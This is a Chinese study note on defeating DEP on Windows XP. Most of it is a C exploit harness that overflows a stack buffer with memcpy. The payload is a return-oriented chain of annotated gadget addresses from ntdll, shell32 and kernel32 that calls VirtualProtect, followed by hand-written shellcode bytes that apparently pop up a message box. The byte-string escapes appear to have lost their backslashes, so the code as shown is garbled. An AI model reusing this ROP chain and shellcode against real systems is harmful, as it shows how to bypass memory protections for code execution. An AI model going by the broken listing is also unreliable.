首先 WINDOWS 2003 是默认开启DEP的 一般都拿2003来做试验
今天我用 XP 开启DEP 做实验 一回事
·······················································
只是学习笔记·····································另外的方法:
Ret2libc NtSetInformationProcess 去关闭DEP
BOOL VirtualProtect( LPVOID lpAddress, // 目标地址起始位置 *shellcode所在内存空间起始地址 DWORD dwSize, // 大小 *shellcode大小 DWORD flNewProtect, // 请求的保护方式 *0x40 PAGE_EXECUTE_READWRITE PDWORD lpflOldProtect // 保存老的保护方式 *某个可写地址 );成功返回非0 修改失败返回0
先总结:
首先 一般都是覆盖 返回地址,因为 软 DEP 也就是 SAFESEH 那么要用 可执行的模块!!!!!!!
!searchcode jmp esp 可以显示 模块属性 DEP寻找特殊代码时要用!!!!!!!!!!!!!!!
书上的例子 是覆盖返回地址 然后 溢出漏洞函数 从 strcpy 改为 memcpy 函数 ,因为它对 "x00"不截断
#include "stdafx.h"
#include <windows.h>
char shellcode[] =
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
// PS 这种方法不能用OD插件快速找到地址,可用 !searchcode jmp esp
//7C80997D 58 pop eax ret
"x7dx99x80x7c"
//地址=7C92E7D9
//消息=Found:POP ESI POP EBX POP EDI RETN at 0x7c92e7d9 Module: C:WINDOWSsystem32
tdll.dll
"xd9xe7x92x7c"//这里不能修改 ESP,EBP,EAX
//地址=7D760702
//消息=Found:PUSH ESP POP EBP RET 4 at 0x7d760702 Module: C:WINDOWSsystem32shell32.dll
"x02x07x76x7d"
//7C92120F C3 retn
"x0fx12x92x7c"
"x90x90x90x90"
"xc6xc6xebx77"//77EBC6C6 push esp jmp esp
"xffx00x00x00" //修改内存大小
"x40x00x00x00" //可读写执行内存属性代码
"xc6xc6xebx77"//77EBC6C6 push esp jmp eax
"x90x90x90x90"
"x90x90x90x90"
/*
7C801AD9 FF75 14 push dword ptr ss:[ebp+0x14]
7C801ADC FF75 10 push dword ptr ss:[ebp+0x10]
7C801ADF FF75 0C push dword ptr ss:[ebp+0xC]
7C801AE2 FF75 08 push dword ptr ss:[ebp+0x8]
7C801AE5 6A FF push -0x1
7C801AE7 E8 75FFFFFF call kernel32.VirtualProtectEx */
"xd9x1ax80x7c"
"x90x90x90x90"
//7C8369F0 FFD4 call esp
"xf0x69x83x7c"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
//shellcode:
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168
;
void test()
{
char str[176];
memcpy(str,shellcode,420);
}
int main(int argc, char* argv[])
{
HINSTANCE hTnst = LoadLibrary("shell32.dll");
char temp[200];
test();
return 0;
}
这种方法不好用啊 看看能不能突破······························因为strcpy要截断字符